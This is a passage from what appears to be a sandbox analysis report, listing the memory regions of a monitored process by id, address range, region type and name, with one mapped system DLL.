0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4551 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4552 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4553 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4554 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4555 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4556 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4557 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4558 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4559 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4560 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4561 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4562 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4563 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4564 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4565 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4566 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4567 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4568 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4569 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4570 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4571 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4572 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4573 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4574 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4575 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4576 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4577 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4578 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4579 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4580 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4581 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4582 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4583 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4584 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4585 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4586 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4587 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4588 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4589 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4590 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4591 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4592 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4593 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4594 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4595 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4596 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4597 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4598 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4599 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4600 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4601 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4602 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4603 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4604 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4605 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4606 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4607 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4608 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4609 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4610 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4611 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4612 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4613 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4614 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4615 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4616 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4617 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4618 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4619 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4620 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4621 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4622 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4623 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4624 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4625 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4626 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4627 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4628 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4629 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4630 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4631 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4632 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4633 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4634 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4635 start_va = 0xfdd0000 end_va = 0x102c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4636 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4637 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4638 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 4639 start_va = 0x107d0000 end_va = 0x10cc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000107d0000" filename = "" Region: id = 4640 start_va = 0x460000 end_va = 0x462fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4641 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4642 start_va = 0x90d0000 end_va = 0x91c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000090d0000" filename = "" Region: id = 4643 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4644 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4645 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4646 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4647 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4648 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4649 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4650 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4651 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4652 start_va = 0x460000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4653 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4654 start_va = 0x4d0000 end_va = 0x4d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4655 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4656 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4657 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4658 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4659 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4660 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4661 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4662 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4663 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4664 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4665 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4666 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4667 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4668 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4669 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4670 start_va = 0x470000 end_va = 0x476fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4671 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4672 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4673 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4674 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4675 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4676 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4677 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4678 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4679 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 4680 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4681 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4682 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4683 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4684 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4685 start_va = 0xfdd0000 end_va = 0x102cdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4686 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4687 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 4688 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4689 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4690 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4691 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4692 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4693 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4694 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4695 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4696 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4697 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4698 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4699 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4700 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4701 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4702 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4703 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4711 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4712 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4713 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4714 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4715 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4716 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4717 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4718 start_va = 0x7ffd44fe0000 end_va = 0x7ffd45082fff monitored = 0 entry_point = 0x7ffd44ff4810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 4719 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4720 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4721 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4722 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4723 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4724 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4725 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4726 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4727 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4728 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4729 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4730 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4731 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4732 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4733 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4734 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4735 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4736 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4737 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4738 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4739 start_va = 0xfdd0000 end_va = 0xfe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdd0000" filename = "" Region: id = 4740 start_va = 0xfe50000 end_va = 0xfecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe50000" filename = "" Region: id = 4741 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4742 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4743 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4744 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4745 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4746 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4747 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4748 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4749 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4750 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4751 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4752 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4753 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4754 start_va 